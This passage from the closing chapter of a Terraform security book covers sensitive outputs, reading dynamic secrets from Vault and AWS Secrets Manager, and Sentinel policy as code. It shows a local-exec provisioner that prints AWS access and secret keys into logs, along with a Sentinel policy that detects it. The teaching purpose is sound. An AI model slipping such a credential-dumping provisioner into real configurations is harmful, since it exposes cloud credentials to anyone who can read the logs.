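A related guardrail worth knowing about: starting with Terraform 0.14, if an output value derives from a sensitive variable, Terraform refuses to apply unless the output itself is also marked sensitive, which keeps it redacted in CLI output (although, as with everything else, the value still ends up in the state file). A minimal sketch:

output "db_password" {
  value     = var.password
  sensitive = true # required when the value derives from a sensitive variable
}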

13.4 Using dynamic secrets

Secrets should be rotated periodically: at least once every 90 days, or in response to known security threats. You don’t want people stealing secrets and using them indefinitely. The smaller the window of time during which a secret is valid, the better. Ideally, secrets should not even exist until they are needed (they should be created “just in time”) and should be revoked immediately after use. These are called dynamic secrets, and they are substantially more secure than static secrets.

We briefly mentioned dynamic secrets earlier, when we discussed the importance of removing unnecessary secrets from Terraform. That was more about moving secrets out of Terraform configuration and into the application layer. For dynamic secrets that cannot be moved into the application layer, the recommended approach is to use a data source that can read secrets from a secrets provider during Terraform execution.

Note If you are running Terraform in automation, you can also write custom logic for reading dynamic secrets—something that does not involve data sources.

In this section, we discuss how data sources from secrets providers like HashiCorp Vault and AWS Secrets Manager can be used to dynamically read secrets into Terraform variables.

13.4.1 HashiCorp Vault

HashiCorp Vault is a secrets-management solution that allows you to store, access, and distribute secrets by authenticating clients against various identity providers (see figure 13.7). It’s a great tool for managing static and dynamic secrets and is fast becoming the gold standard in the industry. Vault is HashiCorp’s biggest source of revenue, generating over $100 million as of 2020.

Figure 13.7 Vault is a secrets-management tool that allows you to store, access, and distribute secrets by authenticating clients against various identity providers.

Operationalizing and deploying Vault is outside the scope of this book. Instead, we will focus on how to integrate Terraform with an existing Vault deployment to read dynamic secrets at runtime.

Vault exposes an API for creating, reading, updating, and deleting secrets. As you might expect, this also means there’s a Vault provider for Terraform that allows managing Vault resources. The Vault provider for Terraform is no different than any other Terraform provider; you declare what you want in code, and Terraform takes care of making the backend API calls on your behalf (see figure 13.8).

Figure 13.8 The Vault provider works just like any other Terraform provider: it integrates with the API backend and exposes resources and data sources to Terraform. Some of these data sources can be used to read dynamic secrets at runtime.

Sample code for configuring the Vault provider, reading secrets from a data source, and using these secrets to configure the AWS provider is shown in listing 13.8. Every time Terraform runs, new short-lived access credentials will be obtained from Vault.

Warning All the previous rules still apply! You still have to securely manage Terraform variables, state files, and log files.

Listing 13.8 Configuring Terraform with Vault

provider "vault" {
  address = var.vault_address
}
 
data "vault_aws_access_credentials" "creds" {
  backend = "aws"
  role    = "prod-role"
}
 
provider "aws" {
  access_key = data.vault_aws_access_credentials.creds.access_key
  secret_key = data.vault_aws_access_credentials.creds.secret_key
  region     = "us-west-2"
}

Note To reduce the risk of exposing secrets, the Vault provider requests tokens with a relatively short time to live (TTL): 20 minutes by default. Any issued credentials are revoked when the token expires.
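
For context, the aws secrets engine and the prod-role referenced in listing 13.8 must already exist in Vault; they can themselves be managed with the Vault provider. The following is a rough sketch, not a complete setup: the root credentials, TTL, and policy ARN are illustrative, and argument names may differ slightly between provider versions.

resource "vault_aws_secret_backend" "aws" {
  path       = "aws" # matches backend = "aws" in listing 13.8
  region     = "us-west-2"
  access_key = var.vault_aws_access_key # long-lived credentials Vault uses to mint short-lived ones
  secret_key = var.vault_aws_secret_key

  default_lease_ttl_seconds = 1200 # 20 minutes
}

resource "vault_aws_secret_backend_role" "prod" {
  backend         = vault_aws_secret_backend.aws.path
  name            = "prod-role" # matches role = "prod-role" in listing 13.8
  credential_type = "iam_user"
  policy_arns     = ["arn:aws:iam::aws:policy/PowerUserAccess"] # illustrative; scope this down in practice
}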

13.4.2 AWS Secrets Manager

AWS Secrets Manager (ASM) is a notable competitor to HashiCorp Vault. It offers basic key-value storage and rotation of secrets but is generally less sophisticated than Vault and lacks many of Vault’s more advanced features. The main advantage of ASM is that it’s a managed service, which means you don’t need to stand up your own infrastructure to use it; it’s ready to go right out of the box.

Note Azure and GCP both have services comparable to ASM, and the process of using them is basically the same.

Like Vault, ASM allows you to read dynamic secrets at runtime with the help of data sources. Some sample code for doing this is shown next.

Listing 13.9 Configuring Terraform with AWS Secrets Manager

data "aws_secretsmanager_secret_version" "db" {
  secret_id = var.secret_id
}
 
locals {
  creds = jsondecode(data.aws_secretsmanager_secret_version.db.secret_string)
}
 
resource "aws_db_instance" "database" {
  allocated_storage = 20
  engine            = "postgres"
  engine_version    = "12.2"
  instance_class    = "db.t2.micro"
  name              = "ptfe"
  username          = local.creds["username"]
  password          = local.creds["password"]
}
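
For reference, the secret that var.secret_id points to has to exist beforehand. You can create the container with Terraform, but it’s usually better to seed the value itself out of band (through the console or CLI) so the plaintext never passes through Terraform. A rough sketch with an illustrative name:

resource "aws_secretsmanager_secret" "db" {
  name = "tia/database-credentials" # pass aws_secretsmanager_secret.db.id in as var.secret_id
}

# Seed the value outside Terraform so it never lands in a plan or state file, for example:
#   aws secretsmanager put-secret-value --secret-id tia/database-credentials \
#     --secret-string '{"username":"admin","password":"hunter2"}'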

Tip If you are not already using Vault to manage secrets, AWS Secrets Manager is a great alternative.

13.5 Sentinel and policy as code

Sentinel is an embeddable policy-as-code framework designed for automating governance, security, and compliance-based decisions. Complex legal and business requirements, which have traditionally been enforced manually by humans, can be expressed entirely as code with Sentinel policies. Sentinel can automatically prevent out-of-compliance Terraform runs from executing. For example, you normally do not want someone deploying 5,000 virtual machines without explicit authorization. With Terraform alone, there are no guardrails to prevent users from doing exactly that. The advantage of Sentinel is that you can write a policy to automatically reject such requests before Terraform applies the changes (see figure 13.9).

Figure 13.9 Sentinel policies are checked between the plan and apply of a Terraform CI/CD pipeline. If any Sentinel policy fails, the run exits with an error condition, and the Apply stage is skipped.

History of Sentinel

The first version of Sentinel was released on September 19, 2017 without much fanfare. At the time, it was not clear how Sentinel could be productized, so nothing much happened until a few months later when HashiCorp advertised Sentinel as a premium service offering for Terraform Enterprise. It was pretty immature as a technology, and I do not know anybody who was using it then. It remained largely unknown and unloved for the next three years.

Today, HashiCorp has revitalized the product. HashiCorp’s Sentinel team includes 10 to 20 full-time engineers, and they have made enormous strides in improving the language and increasing adoption. In March 2020, an important update (v0.15) was released that fixed a lot of issues with Sentinel and finally convinced me of Sentinel’s bright future in the HashiCorp ecosystem.

Sentinel is a stand-alone HashiCorp product designed to work with all of HashiCorp’s Enterprise service offerings, including Consul, Nomad, Terraform, and Vault. It has matured over the years and finally found its place under HashiCorp’s “Better Together” narrative. But before I get you too excited about Sentinel and the great things it can do, you should know that it isn’t open source and doesn’t work with open source Terraform.

Can I use Sentinel without an Enterprise license?

Sentinel is distributed as a golang binary, which means anyone can download it and use it for free (although the source code is kept secret). The problem is that to do anything useful with Sentinel, you need access to the plugins written for Terraform, which are currently reserved for Enterprise customers (and, to a lesser extent, Terraform Cloud).

Sentinel plugins are just golang code, so it’s theoretically possible that someone could write their own plugin with all the same features as the one HashiCorp created and then open source it. But so far, nobody has taken the initiative to do so. If this were to be done, then anyone could use Sentinel with Terraform and not have to pay HashiCorp. It’s also possible that HashiCorp could simply open source Sentinel in the future.

13.5.1 Writing a basic Sentinel policy

Sentinel policies are not written in HCL, as you might expect. Instead, they are written in Sentinel, a domain-specific programming language with a passing resemblance to Python. Sentinel policies are made up of rules, which are basically just functions that return either true or false (pass or fail). As long as all the rules in a policy pass, the overall policy passes. If you are using Sentinel in a CI/CD pipeline, that means execution continues to the apply stage.

The following is a trivial Sentinel policy that passes for all use cases:

main = rule {     
    true 
}

A policy with a single rule that always evaluates to true

Why DSL and not Python, Ruby, or another programming language?

Sometimes I think that Mitchell Hashimoto and Armon Dadgar (HashiCorp’s other co-founder) just like creating new programming languages for the heck of it. After all, why create HCL when JSON or YAML would do? Why create Sentinel when Python or Ruby is good enough? The answer is that Armon and Mitchell have an ambitious and unwavering vision, and they decided the best way to realize it was to invest in creating a new programming language.

The most important design element of Sentinel is that it’s a sandbox programming language. Most other languages have security loopholes or backdoors that can be used to bypass normal operations and escalate system access. Ruby and Python, for example, are both dynamic languages that can be monkey-patched at runtime. As a language designed with governance and compliance in mind, Sentinel had to be embeddable to be secure from hackers. Another sandbox programming language like Lua or JavaScript could have worked, but the syntax wouldn’t have been as clean, as neither was initially created with the goal of writing policy as code.

As an emerging technology, Sentinel is not as mature as most other programming languages, but it does have all the basic expressions and syntax elements you expect. It also has an adequate, if rather small, standard library. This makes Sentinel good for day-to-day work, even if it’s not the greatest programming language ever.

13.5.2 Blocking local-exec provisioners

The goal of this book isn’t to teach Sentinel, but I want to give you a feel for the practical problems you can solve with it. Consider the dilemma we had earlier with being able to print environment variables such as AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY using local-exec provisioners. Here’s the code that did this:

resource "null_resource" "uh_oh" {
  provisioner "local-exec" {
    command = <<-EOF
        echo "access_key=$AWS_ACCESS_KEY_ID"
        echo "secret_key=$AWS_SECRET_ACCESS_KEY"
    EOF
    }
}

Without Sentinel, you would have to manually skim through all the configuration code to make sure nobody is abusing local-exec provisioners this way. With Sentinel, you can write a policy that automatically blocks any Terraform run whose configuration code contains the keyword AWS_ACCESS_KEY_ID or AWS_SECRET_ACCESS_KEY in a provisioner. The following Sentinel policy does just that.

Listing 13.10 Sentinel policy for validating local-exec provisioners

import "tfconfig/v2" as tfconfig
 
keywordInProvisioners = func(s){
    bad_provisioners = filter tfconfig.provisioners as _, p {
        p.type is "local-exec" and
        p.config.command["constant_value"] matches s
    }
    return length(bad_provisioners) > 0
}
 
no_access_keys = rule {
    not keywordInProvisioners("AWS_ACCESS_KEY_ID")
}
 
no_secret_keys = rule {
    not keywordInProvisioners("AWS_SECRET_ACCESS_KEY")
}
 
main = rule {                
    no_access_keys and
    no_secret_keys
}

Rule that disallows access keys and secret keys from being printed by local-exec provisioners

Note Sentinel policies are not easy to write! You should expect a steep learning curve even if you are already a skilled programmer.

If we incorporate this Sentinel policy as part of our CI/CD pipeline, a subsequent run fails with the following error message:

$ sentinel apply p.sentinel
Fail
 
Execution trace. The information below will show the values of all
the rules evaluated and their intermediate boolean expressions. Note that
some boolean expressions may be missing if short-circuit logic was taken.
 
FALSE - p.sentinel:19:1 - Rule "main"             
  FALSE - p.sentinel:20:2 - no_access_keys
    FALSE - p.sentinel:12:2 - not keywordInProvisioners("AWS_ACCESS_KEY_ID")
      TRUE - p.sentinel:5:3 - p.type is "local-exec"
      TRUE - p.sentinel:6:3 - p.config.command["constant_value"] matches s
 
FALSE - p.sentinel:11:1 - Rule "no_access_keys"
  TRUE - p.sentinel:5:3 - p.type is "local-exec"
  TRUE - p.sentinel:6:3 - p.config.command["constant_value"] matches s

The main rule has failed because the “no_access_keys” composition rule has failed.

You can use Sentinel to enforce that any attribute on any resource is what you want it to be. Examples of other common policies include disallowing 0.0.0.0/0 Classless Inter-Domain Routing (CIDR) blocks, restricting the instance types of Elastic Compute Cloud (EC2) instances, and enforcing tagging on resources.

TIP If you are not a programmer or don’t have time to write your own policies, you can also use policies written by other people (which are published as Sentinel modules).

13.6 Final words

We are at the end of the last chapter of the book. You now know the fundamentals of Terraform, which are important as an individual contributor, as well as how to manage, extend, automate, and secure Terraform. You know all the tricks and backdoors that hackers can use to steal your sensitive information—and, more important, you know how to fight back. At this point, you should feel extremely confident in your ability to tackle any problem with Terraform. You are a Terraform guru now, and people will look to you for guidance on the subject matter.

Even though this is the end of our journey together, I hope you will have many more great experiences working with Terraform in the future. Please email me or leave a review if you liked the book. Thanks for reading.

Summary

  • State files can be secured by removing unnecessary secrets, enforcing least-privileged access control, and using encryption at rest.

  • Log files can be secured by turning off trace logs and avoiding the use of local-exec provisioners, external data sources, and the HTTP provider.

  • Static secrets should be set as environment variables whenever possible. If you absolutely must use Terraform variables, consider maintaining a separate secrets.tfvars file explicitly for this purpose.

  • Dynamic secrets are far safer than static secrets because they are created on demand and valid for only the period of time they will be used. You can read dynamic secrets with the corresponding data source from Vault or the AWS provider.

  • Sentinel can enforce policy as code. Sentinel policies automatically reject Terraform runs based on the contents of the configuration code or the results of a plan.
